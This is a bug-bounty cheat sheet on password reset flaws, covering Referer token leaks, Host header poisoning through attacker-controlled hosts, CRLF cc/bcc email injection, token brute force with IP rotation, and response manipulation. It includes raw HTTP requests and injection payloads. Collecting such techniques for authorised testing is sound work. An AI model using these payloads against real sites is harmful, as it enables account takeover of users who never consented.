Table of Contents
Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports.
[1] Password Reset Token Leak Via Referrer
The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed
Exploitation
- Request password reset to your email address
- Click on the password reset link
- Dont change password
- Click any 3rd party websites(eg: Facebook, twitter)
- Intercept the request in burpsuite proxy
- Check if the referer header is leaking password reset token.
Impact
It allows the person who has control of particular site to change the user’s password (CSRF attack), because this person knows reset password token of the user.
Reference:
- https://hackerone.com/reports/342693
- https://hackerone.com/reports/272379
- https://hackerone.com/reports/737042
- https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
- https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
[2] Account Takeover Through Password Reset Poisoning
If you find a host header attack and it’s out of scope, try to find the password reset button!
Exploitation
- Intercept the password reset request in Burpsuite
- Add follwing header or edit header in burpsuite(try one by one)
You can use ngrok server as your attacker server
Host: attacker.com
or
Host: target.com
X-Forwarded-Host: attacker.com
or
Host: target.com
Host: attacker.com
- Forward the request
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: evilhost.com
- If you find a password reset token like this
https://evilhost.com/reset-password.php?token=12345678-1234-1234-1234-12345678901
Patch
Use $_SERVER['SERVER_NAME'] rather than $_SERVER['HTTP_HOST']
password link is genrated like this:
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
Impact
The victim will receive the malicious link in their email, and, when clicked, will leak the user’s password reset link / token to the attacker, leading to full account takeover.
Reference:
- https://hackerone.com/reports/226659
- https://hackerone.com/reports/167631
- https://www.acunetix.com/blog/articles/password-reset-poisoning/
- https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
- https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
[3] Account Takeover: Password Reset With Manipualating Email Parameter
Exploitation
- Add attacker email as second parameter using &
POST /resetPassword
[...]
[email protected]&[email protected]
- Add attacker email as second parameter using %20
POST /resetPassword
[...]
[email protected]%[email protected]
- Add attacker email as second parameter using |
POST /resetPassword
[...]
[email protected]|[email protected]
- Add attacker email as second parameter using cc
POST /resetPassword
[...]
email="[email protected]%0a%0dcc:[email protected]"
- Add attacker email as second parameter using bcc
POST /resetPassword
[...]
email="[email protected]%0a%0dbcc:[email protected]"
- Add attacker email as second parameter using ,
POST /resetPassword
[...]
email="[email protected]",email="[email protected]"
- Add attacker email as second parameter in json array
POST /resetPassword
[...]
{"email":["[email protected]","[email protected]"]}
Reference
- https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
- https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
- https://twitter.com/HusseiN98D/status/1254888748216655872
[4] Full Account Takeover via Changing Email And Password of any User through API Parameters
Exploitation
- Attacker have to login with their account and Go to the Change password function
- Start the Burp Suite and Intercept the request
- After intercepting the request sent it to repeater and modify parameters Email and Password
POST /api/changepass
[...]
("form": {"email":"[email protected]","password":"12345678"})
Reference
[5] No Rate Limiting: Email Bombing
Exploitation
- Start the Burp Suite and Intercept the password reset request
- Send to intruder
- Use null payload
Reference
[6] Findout How Password Reset Token is Genrated
Figure out the pattern of passoword reset token / If it:
- Generated based Timestamp
- Generated based on the UserID
- Generated based on email of User
- Generated based on Firstname and Lastname
- Generated based on Date of Birth
- Generated based on Cryptography
Use Burp Sequencer to find the randomness or predictability of tokens.
[7] Response manipulation: Replace Bad Response With Good One
Look for Request and Response like these
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
Change Response
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
Reference
[8] Using Expired Token
- Check if the expired token can be reused
[9] Brute Force Password Rest token
Try to bruteforce the reset token using Burpsuite
POST /resetPassword
[...]
[email protected]&code=$BRUTE$
- Use IP-Rotator on burpsuite to bypass IP based ratelimit.
Reference
[10] Try Using Your Token
- Try adding your password reset token with victim’s Account
POST /resetPassword
[...]
[email protected]&code=$YOUR_TOKEN$
Reference
Bonus
- Completely remove the token
- change it to 00000000…
- use null/nil value
- try an array of old tokens
- look for race conditions
- change 1 char at the begin/end to see if the token is evaluated
- try to register the same mail with different TLD (.eu,.net etc)
- don’t add the domain user@
- try sqli bypass and wildcard or, %, *
- change request method (get, put, post etc) and/or content type (xml<>json)
- use super long string
- use array brackets ex: reset.php?id[]=11cb193b98bv3421